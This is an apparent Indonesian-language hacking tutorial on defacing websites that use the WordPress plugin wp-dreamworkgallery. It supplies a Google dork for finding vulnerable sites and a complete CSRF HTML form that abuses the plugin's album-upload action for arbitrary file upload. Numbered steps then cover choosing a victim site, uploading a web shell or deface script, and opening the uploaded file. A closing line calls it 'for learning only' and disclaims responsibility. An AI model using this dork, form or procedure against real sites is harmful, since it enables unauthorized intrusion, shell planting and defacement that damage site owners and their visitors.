Deface wordpress-theme-dreamworkgallery

hello friend
kali ini gua mau share tutor deface wp-theme-dreamworkgallery

oke langsung ea

bahan

1. dork  :  inurl:/wp-content/plugins/wp-dreamworkgallery/ kembangin biar dapet fresh and ferawan

2. csrf :

<form action="http:/target/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" />
<input type="submit" value="HAJAR!" /> </form>

copy ni csrf via notepad kalo udah simpen dengan extensi html

langkah :

1.dorking gugel

2.pilih salah satu site nya

3.copy site masukin ke csrf nih di sini

4. simpan lagi csrf nya, trusss buka csrf nya lewat web browser ntar keluar tampilan kek gini
    nah di sini lah kita upload shell/script deface kita

5.upload deh shell /script nya 

6.kalo udah berhasil tampilanya kek gini ada letak file upload an kita 

7.kalo mau liat hasil deface nya tinggal copy letak file yg kita upload

8. nah trus tekan enter taraaa berhasil kan

kalo kurang jelas bisa liat video ini

oke sekian dulu tutor dari saya, ini cuma buat pembelajaran aja yaaa kalo ada apa2 saya gak bertanggung jawab  see you

thanks to BERANDAL